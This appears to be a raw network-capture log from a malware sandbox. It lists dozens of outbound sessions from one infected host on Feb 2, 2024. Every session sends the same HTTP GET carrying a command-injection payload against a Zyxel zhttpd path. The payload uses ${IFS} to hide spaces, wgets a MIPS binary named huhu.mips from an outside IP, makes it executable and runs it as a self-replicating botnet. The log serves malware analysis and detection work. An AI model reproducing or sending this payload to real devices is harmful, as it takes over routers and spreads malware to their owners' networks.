                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2208192.168.2.145780818.112.247.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443030119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2209192.168.2.1455530155.159.135.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443044901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2210192.168.2.1453110209.222.206.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443080902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2211192.168.2.1453712167.183.218.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443146944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2212192.168.2.1443632118.96.48.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443175077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2213192.168.2.145610420.197.254.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443219900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2214192.168.2.144849463.183.17.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443258047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2215192.168.2.14397769.205.190.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443303108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2216192.168.2.145697423.195.120.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443331957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2217192.168.2.144570636.52.197.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443370104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2218192.168.2.1441428175.94.170.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443409920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2219192.168.2.143507854.170.147.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443448067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2220192.168.2.144094461.36.47.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443497896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2221192.168.2.145498097.44.84.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443530083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2222192.168.2.1449720100.223.100.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443582058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2223192.168.2.145126478.204.163.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443620920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2224192.168.2.1456630183.230.49.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443670034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2225192.168.2.1434372223.126.210.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443726063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2226192.168.2.145184857.149.195.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443741083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2227192.168.2.1436030171.13.172.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443763971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2228192.168.2.1447734200.150.76.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443811893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2229192.168.2.1438104220.81.74.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443847895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2230192.168.2.143695297.218.122.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443896055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2231192.168.2.144352098.203.51.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443933964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2232192.168.2.1452322117.233.123.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.443973064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2233192.168.2.145806448.156.67.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444032907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2234192.168.2.1454220190.130.165.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444078922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2235192.168.2.1450022145.247.101.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444103956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2236192.168.2.145535897.229.190.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444127083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2237192.168.2.1460288218.91.18.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444170952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2238192.168.2.1440152210.180.95.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444200039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2239192.168.2.1459526119.160.189.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444231987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2240192.168.2.145752268.46.246.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444262981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2241192.168.2.1440278111.195.173.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444295883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2242192.168.2.1437412117.87.153.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444338083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2243192.168.2.145417036.253.5.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444365025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2244192.168.2.1445576192.146.126.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444415092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2245192.168.2.144417265.253.121.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444464922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2246192.168.2.1449520168.171.99.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444504976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2247192.168.2.1453876137.91.25.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444551945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2248192.168.2.143352844.165.21.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444592953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2249192.168.2.143987660.131.137.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444638014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2250192.168.2.14394202.181.172.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444685936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2251192.168.2.143473061.150.231.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444700956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2252192.168.2.1439370114.246.35.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444737911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2253192.168.2.1444580160.107.200.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444786072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2254192.168.2.1439326163.117.209.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444814920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2255192.168.2.143552840.105.72.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444859982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2256192.168.2.1441430189.94.121.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444911003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2257192.168.2.1449466108.121.200.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444992065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2258192.168.2.1439362110.24.218.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.444996119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2259192.168.2.1437778203.68.186.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445024967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2260192.168.2.1454648217.212.103.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445122004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2261192.168.2.145801642.170.168.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445138931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2262192.168.2.145786695.189.154.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445220947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2263192.168.2.145450096.205.209.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445285082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2264192.168.2.1446286136.236.168.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445302963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2265192.168.2.143680892.15.83.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445321083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2266192.168.2.1449480204.108.14.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445333004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2267192.168.2.1458136154.70.108.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445370913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2268192.168.2.143434220.55.242.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445409060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2269192.168.2.144690225.125.163.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445440054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2270192.168.2.145847477.180.41.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.445466042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
